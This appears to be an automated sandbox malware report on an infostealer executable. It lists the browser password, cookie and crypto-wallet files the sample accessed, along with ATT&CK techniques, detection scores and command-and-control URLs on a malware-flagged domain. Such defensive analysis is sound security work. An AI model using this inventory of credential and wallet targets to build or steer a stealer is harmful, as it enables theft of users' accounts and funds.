                Source: YKri2nEBWE.exe, 00000000.00000002.2368272162.0000000001529000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: keystore
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; Directory queried: C:\Users\user\Documents\QVTVNIBKSD
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; Directory queried: C:\Users\user\Documents\IVHSHTCODI
                Source: C:\Users\user\Desktop\YKri2nEBWE.exe; Directory queried: C:\Users\user\Documents\NHPKIZUUSG
                Source: Yara match; File source: 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: YKri2nEBWE.exe PID: 6460, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match; File source: Process Memory Space: YKri2nEBWE.exe PID: 6460, type: MEMORYSTR
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
                | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 12 Windows Management Instrumentation | 1 DLL Side-Loading | 1 Process Injection | 44 Virtualization/Sandbox Evasion | 2 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                | Credentials | Domains | Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 851 Security Software Discovery | Remote Desktop Protocol | 41 Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
                | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 44 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
                | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 2 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction |
                | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
                | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |

                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | YKri2nEBWE.exe | 57% | Virustotal | | Browse |
                | YKri2nEBWE.exe | 63% | ReversingLabs | Win32.Infostealer.Tinba | |
                | YKri2nEBWE.exe | 100% | Avira | TR/Crypt.TPM.Gen | |
                | YKri2nEBWE.exe | 100% | Joe Sandbox ML | | |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                | Source | Detection | Scanner | Label | Link |
                |---|---|---|---|---|
                | https://lev-tolstoi.com/piNXxr& | 100% | Avira URL Cloud | malware | |
                | https://lev-tolstoi.com/W | 100% | Avira URL Cloud | malware | |
                | https://community.fastly.steamstatiS | 0% | Avira URL Cloud | safe | |
                | https://community.fastly.steamstatics | 0% | Avira URL Cloud | safe | |
                | https://community.y | 0% | Avira URL Cloud | safe | |
                | https://lev-tolstoi.com/t | 100% | Avira URL Cloud | malware | |
                | https://community.= | 0% | Avira URL Cloud | safe | |
                | https://lev-tolstoi.com/apil | 100% | Avira URL Cloud | malware | |
                | https://community.fastly.steamstatic.cc | 0% | Avira URL Cloud | safe | |
                | https://lev-tolstoi.com/apix | 100% | Avira URL Cloud | malware | |
                | https://lev-tolstoi.com/apis | 100% | Avira URL Cloud | malware | |
                | https://lev-tolstoi.com/uo0 | 100% | Avira URL Cloud | malware | |
                | https://community.fastly.steamb | 0% | Avira URL Cloud | safe | |
                | https://lev-tolstoi.com/apiB | 100% | Avira URL Cloud | malware | |
                | https://lev-tolstoi.com/0 | 100% | Avira URL Cloud | malware | |
                | https://lev-tolstoi.com/apimC | 100% | Avira URL Cloud | malware | |
                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/gYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://lev-tolstoi.com/apixYKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      unknown
                                                                                                                                                      https://lev-tolstoi.com/apisYKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366999109.00000000015CE000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368621513.00000000015CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                      unknown
                                                                                                                                                      https://steamcommunity.com/discussions/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://community.fastly.steambYKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        unknown
                                                                                                                                                        https://store.steampowered.com/stats/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/steam_refunds/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://lev-tolstoi.com/uo0YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: malware
                                                                                                                                                                  unknown
                                                                                                                                                                  http://x1.c.lencr.org/0YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://x1.i.lencr.org/0YKri2nEBWE.exe, 00000000.00000003.2255321255.0000000005EDD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchYKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://lev-tolstoi.com/apimCYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174849256.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              unknown
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/workshop/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.allYKri2nEBWE.exe, 00000000.00000003.2257083014.00000000060FE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://store.steampowered.com/legal/YKri2nEBWE.exe, 00000000.00000003.2283078885.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2309668421.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000002.2368577753.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2287405344.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2327042056.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2366814829.00000000015B5000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.000000000152C000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174533511.00000000015BC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2326949332.000000000159E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&amp;l=enYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=engYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://lev-tolstoi.com/apiBYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                                                                            unknown
                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&amYKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2174829287.00000000015A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://community.fastly.steamstatic.com/publicYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icoYKri2nEBWE.exe, 00000000.00000003.2176974679.0000000005E20000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177049592.0000000005E1D000.00000004.00000800.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2177131102.0000000005E1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&aYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=englYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://lev-tolstoi.com/0YKri2nEBWE.exe, 00000000.00000003.2174597834.0000000001564000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      https://steamcommunity.com/linkfilteYKri2nEBWE.exe, 00000000.00000003.2174597834.000000000152B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://store.steampowered.com/YKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=eYKri2nEBWE.exe, 00000000.00000003.2151287475.00000000015AC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?CYKri2nEBWE.exe, 00000000.00000003.2151309651.0000000001564000.00000004.00000020.00020000.00000000.sdmp, YKri2nEBWE.exe, 00000000.00000003.2151486923.0000000001571000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs
IP              Domain              Country        ASN    ASN Name         Malicious
172.67.157.254  lev-tolstoi.com     United States  13335  CLOUDFLARENETUS  false
104.102.49.254  steamcommunity.com  United States  16625  AKAMAI-ASUS      false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1580915
Start date and time: 2024-12-26 13:08:26 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: YKri2nEBWE.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:1c4c5cca8b9c930895e0e425563cf07e.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:Failed
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.175.87.197
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time      Type             Description
07:09:21  API Interceptor  10x Sleep call for process: YKri2nEBWE.exe modified
                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              172.67.157.254GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    i8Vwc7iOaG.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, StormKitty, VidarBrowse
                                                                                                                                                                                                                      6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            L5Kgf2Tvkc.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              fkawMJ7FH8.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLine, StealcBrowse
                                                                                                                                                                                                                                Bire1g8ahY.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                                                                                                                                                  104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                  • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                                                  http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • www.valvesoftware.com/legal.htm
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  lev-tolstoi.comz3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  4KDKJjRzm8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  C8QT9HkXEb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  0hRSICdcGg.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  6GNqkkKY0j.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  Ebgl8jb6CW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  35K4Py4lii.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.21.66.86
                                                                                                                                                                                                                                  3zg6i6Zu1u.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 172.67.157.254
                                                                                                                                                                                                                                  steamcommunity.comghumRvJGY9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 104.102.49.254
                                                                                                                                                                                                                                  z3IxCpcpg4.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  GtEVo1eO2p.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  AiaStwRBdI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  HJVzgKyC0y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  rUfr2hQGOb.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  YhF4vhbnMW.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  SPFFah2O2q.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  B8NcU4mckY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  k6olCJyvIj.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  • 23.55.153.106
                                                                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                  CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  • 104.21.6.3
